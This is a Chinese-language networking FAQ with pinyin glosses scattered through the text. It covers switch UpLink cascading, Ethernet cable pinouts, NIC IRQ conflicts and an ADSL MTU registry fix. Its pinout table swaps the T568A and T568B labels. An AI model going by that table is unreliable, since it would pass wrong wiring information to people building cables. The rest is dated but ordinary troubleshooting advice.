答(dá)：UpLink口是交換機上(shàng)常見的一種端口，它是爲了(le)便于兩台交換機之間進行級聯的端口。它與其相鄰的普通UTP口使用(yòng)的是同一通道(dào)，因而，如果使用(yòng)了(le)UpLink口，另一個與之相鄰的普通端口就不能(néng)再使用(yòng)了(le)。這(zhè)兩個端口稱爲共享端口，不能(néng)同時(shí)使用(yòng)。級聯的時(shí)候，你(nǐ)可使用(yòng)一般的網線（網線的兩端都遵循同一标準，即同是EIA/TIA 568A或568B）将一個交換機的普通端口和(hé)另一個交換機的UpLink口連起來(lái)。如兩個設備都使用(yòng)UpLink口連接，網線需要一端使用(yòng)EIA/TIA 568A的标準，另一端使用(yòng)EIA/TIA 568B的标準（如下(xià)表）。

标準568a 标準568b

橙白(bái)1 綠白(bái)1

橙2 綠2

綠白(bái) 3 橙白(bái)3

藍4 藍4

藍白(bái)5 藍白(bái)5

綠6 橙6

棕白(bái)7 棕白(bái)7

棕8 棕8

問：我在安裝網卡後，在“系統→設備管理(lǐ)器”中網卡出現(xiàn)黃色的“！”号，請(qǐng)問該如何解決？

答(dá)：網卡較容易與其他(tā)設備發生資源沖突，尤其是在系統中安裝有多個插卡的情況下(xià)，解決辦法是：

1、更換網卡在主闆插槽上(shàng)的位置是最好(hǎo)的解決辦法。

2、在該網卡“屬性”窗口“資源”标簽中找到(dào)“資源類型”列表，選定發生沖突的“資源”，按“更改設置”按鈕，更改發生沖突的IRQ中斷号或者I/O地址。

3、有些(xiē)PCI網卡會(huì)強行占用(yòng)IRQ10，與一些(xiē)強行占用(yòng)IRQ10的顯示卡發生IRQ中斷沖突，如果遇到(dào)這(zhè)種情況，可在BIOS中将“Assign IRQ For VGA”項設置爲Disabled，不給顯示卡分配固定的中斷。

4、運行網卡附帶的軟盤中的設置程序，将網卡設置爲非PNP模式，設置IRQ中斷号和(hé)I/O地址爲系統未占用(yòng)的地址；并在BIOS中将相應中斷号由PCI/ISA改爲Legacy ISA。

如果使用(yòng)上(shàng)述方法均不能(néng)解決故障，建議(yì)換一塊網卡試試。

問：ADSL上(shàng)網網頁打不開(kāi)的問題？

答(dá)：是MTU的問題！改一下(xià)注冊表！

HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Class/NetTrans/0000/主鍵下(xià)面建立字符串鍵名爲MaxMTU，鍵值爲1450

上(shàng)一篇：合肥拓野網絡公司教大(dà)家網絡劫持的定義
下(xià)一篇：計(jì)算(suàn)機網絡基礎知(zhī)識